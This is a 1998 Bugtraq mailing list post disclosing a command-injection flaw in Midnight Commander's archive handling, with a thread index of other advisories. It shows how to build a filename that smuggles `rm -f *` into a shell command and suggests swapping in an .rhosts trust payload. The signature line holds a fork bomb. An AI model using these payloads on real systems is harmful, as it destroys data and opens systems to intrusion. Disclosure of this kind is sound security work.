Bugtraq mailing list archives
MC shell scripts
From: lcamtuf () POLBOX COM (Micha? Zalewski)
Date: Sat, 17 Jan 1998 22:14:45 +0100
I discovered a problem with Midnight Commander's method of decompressing archives, which allows execution of hidden commands. Evil file may be prepared this way: $ gzip foo $ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz" Now, this filename, when displayed by user-friendly programs (www or ftp browsers, file managers), will be cropped to fit in a window :) Under my mc (vidmode 11) it's displayed as: quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :) When I'm viewing or editing .gz archive (F3/F4/ENTER) - Midnight Commander calls gzip from a shell script created in /tmp: gzip -dc 'filename' 2>/dev/null That may be dangerous. In above case, this script is equal to: gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null rm -f * 'rm -f *' may be replaced with 'echo + +>.rhosts', 'touch WHOS_THE_WINNER' etc ;) Of course, it isn't serious problem for experienced users, but what's with the non-experienced ones (80%) ;-) _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl] =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
Current thread:
- Re: GCC 2.7.? /tmp files Michael Douglass (Jan 15)
- MC shell scripts Micha? Zalewski (Jan 17)
- Re: GCC 2.7.? /tmp files Theo de Raadt (Jan 18)
- Re: GCC 2.7.? /tmp files Perry E. Metzger (Jan 18)
- Solaris ftpd D.O.S. Stanley Stasiak (Jan 19)
- Buffer overflow in Yapp Conferencing System... satan (Jan 20)
- Re: Solaris ftpd D.O.S. Aggelos P. Varvitsiotis (Jan 20)
- Re: Solaris ftpd D.O.S. Casper Dik (Jan 20)
- SNI-23: SSH - Vulnerability in ssh-agent Secure Networks Inc. (Jan 20)
- How to recover private keys for various Microsoft products Aleph One (Jan 20)
- HP-UX CUE, CUD and LAND vulnerabilities Aleph One (Jan 21)
- Re: Xserver stack smashed -- wrapper John Goerzen (Jan 21)
(Thread continues...)